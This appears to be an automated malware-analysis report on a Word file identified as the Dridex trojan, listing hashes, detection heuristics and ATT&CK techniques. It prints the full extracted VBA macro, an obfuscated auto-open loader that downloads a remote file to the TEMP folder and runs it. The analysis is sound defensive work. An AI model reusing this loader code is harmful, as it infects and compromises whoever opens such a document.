Dridex — Office (OLE) malware analysis

Static analysis result for SHA-256 52e7cf353466ed7a…

MALICIOUS

Office (OLE)

Size: 39.0 KB
Created: 2015-03-08 23:46:00
Authoring application: Microsoft Office Word
First seen: 2015-03-15
MD5: a93b037fbc33b44534318540dbb9d6f1
SHA-1: 69b78737d813d444bbaba0eede220552752839e2
SHA-256: 52e7cf353466ed7a34da9fd5be5b14ac25a364493ac41ab7626b421904277943
Risk Score: 376

Malware Insights

Dridex · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample contains VBA macros with an autoopen subroutine, which is a common technique for executing malicious code upon opening the document. Critical heuristics indicate the use of URLDownloadToFile and obfuscated auto-exec loaders, suggesting the macro's purpose is to download and execute a secondary payload. ClamAV detection as Doc.Trojan.Dridex-7 further supports this assessment.

Heuristics (10)

  • ClamAV: Doc.Trojan.Dridex-7 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Dridex-7
  • Reference to URLDownloadToFile API [critical] SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected [medium, 6 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA [critical] OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
        "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set ываААвыаыва = CreateObject(FhjvhjsdfksdfF(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82)))
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set ываААвыаыва = CreateObject(FhjvhjsdfksdfF(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82)))
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    рпорпАавпавп FhjvhjsdfksdfF(Chr$(104) & Chr$(40) & Chr$(116) & Chr$(69) & Chr$(116) & Chr$(83) & Chr$(112) & Chr$(86) & Chr$(58) & Chr$(104) & Chr$(47) & Chr$(50) & Chr$(47) & Chr$(40) & Chr$(99) & Chr$(96) & Chr$(111) & Chr$(100) & Chr$(98) & Chr$(63) & Chr$(101) & Chr$(75) & Chr$(110) & Chr$(112) & Chr$(101) & Chr$(127) & Chr$(46) & Chr$(107) & Chr$(100) & Chr$(68) & Chr$(101) & Chr$(59) & Chr$(47) & Chr$(60) & Chr$(106) & Chr$(57) & Chr$(115) & Chr$(66) & Chr$(47) & Chr$(37) & Chr$(98) & Chr$ …
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename:   macros.bas
Kind:       vba-macro
Source:     oletools.olevba.extract_macros (decoded VBA source)
Size:       5345 bytes
SHA-256:    5d2083fe1fa0609a69a7dbf96641768d6d3fad7e3b373aa1b8ef6aa4ae9c792f
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
FUvhdsfkHJfg
End Sub


Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class4"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class5"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "АавпавпАА"

Public Function FhjvhjsdfksdfF(VdkAbaqgjbz As String) As String
For HFncwnerBk = 1 To Len(VdkAbaqgjbz) Step 2
FhjvhjsdfksdfF = FhjvhjsdfksdfF & Mid(VdkAbaqgjbz, HFncwnerBk, 1)
Next
End Function


Attribute VB_Name = "ываывААва"
#If VBA7 Then
    Private Declare PtrSafe Function гшПНШываа Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
    ByVal ПСрпспсппОап As String, _
    ByVal ПСрпспсппОапf As String, _
    ByVal ПСрпспсппОапfd As Long, _
    ByVal ПСрпспсппОапfds As LongPtr) As LongPtr
#Else
    Private Declare Function гшПНШываа Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
    ByVal ПСрпспсппОап As String, _
    ByVal ПСрпспсппОапf As String, _
    ByVal ПСрпспсппОапfd As Long, _
    ByVal ПСрпспсппОапfds As Long) As Long
#End If
Sub FUvhdsfkHJfg()
рпорпАавпавп FhjvhjsdfksdfF(Chr$(104) & Chr$(40) & Chr$(116) & Chr$(69) & Chr$(116) & Chr$(83) & Chr$(112) & Chr$(86) & Chr$(58) & Chr$(104) & Chr$(47) & Chr$(50) & Chr$(47) & Chr$(40) & Chr$(99) & Chr$(96) & Chr$(111) & Chr$(100) & Chr$(98) & Chr$(63) & Chr$(101) & Chr$(75) & Chr$(110) & Chr$(112) & Chr$(101) & Chr$(127) & Chr$(46) & Chr$(107) & Chr$(100) & Chr$(68) & Chr$(101) & Chr$(59) & Chr$(47) & Chr$(60) & Chr$(106) & Chr$(57) & Chr$(115) & Chr$(66) & Chr$(47) & Chr$(37) & Chr$(98) & Chr$(51) & Chr$(105) & Chr$(64) & Chr$(110) & Chr$(96) & Chr$(46) & Chr$(48) & Chr$(101) & Chr$(46) & Chr$(120) & Chr$(77) & Chr$(101) & Chr$(58)), Environ(FhjvhjsdfksdfF(Chr$(84) & Chr$(96) & Chr$(77) & Chr$( _
109) & Chr$(80) & Chr$(123))) & FhjvhjsdfksdfF(Chr$(92) & Chr$(81) & Chr$(102) & Chr$(106) & Chr$(74) & Chr$(105) & Chr$(67) & Chr$(36) & Chr$(104) & Chr$(43) & Chr$(106) & Chr$(48) & Chr$(102) & Chr$(132) & Chr$(103) & Chr$(80) & Chr$(68) & Chr$(109) & Chr$(54) & Chr$(95) & Chr$(55) & Chr$(65) & Chr$(53) & Chr$(130) & Chr$(101) & Chr$(134) & Chr$(68) & Chr$(74) & Chr$(84) & Chr$(129) & Chr$(85) & Chr$(37) & Chr$(46) & Chr$(64) & Chr$(101) & Chr$(57) & Chr$(120) & Chr$(124) & Chr$(101) & Chr$(50))


End Sub
Function рпорпАавпавп(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean
плрпААавпп = гшПНШываа(0&, z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&, 0&)
Set ываААвыаыва = CreateObject(FhjvhjsdfksdfF(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82)))

ываААвыаыва.Open Environ(FhjvhjsdfksdfF(Chr$(84) & Chr$(51) & Chr$(77) & Chr$(71) & Chr$(80) & Chr$(83))) & FhjvhjsdfksdfF(Chr$(92) & Chr$(75) & Chr$(102) & Chr$(98) & Chr$(74) & Chr$(130) & Chr$(67) & Chr$(59) & Chr$(104) & Chr$(73) & Chr$(106) & Chr$(76) & Chr$(102) & Chr$(94) & Chr$(103) & Chr$(40) & Chr$(68) & Chr$(130) & Chr$(54) & Chr$(87) & Chr$(55) & Chr$(90) & Chr$(53) & Chr$(53) & Chr$(101) & Chr$(65) & Chr$(68) & Chr$(102) & Chr$(84) & Chr$(118) & Chr$(85) & Chr$(97) & Chr$(46) & Chr$(58) & Chr$(101) & Chr$(49) & Chr$(120) & Chr$(50) & Chr$(101) & Chr$(47))
End Function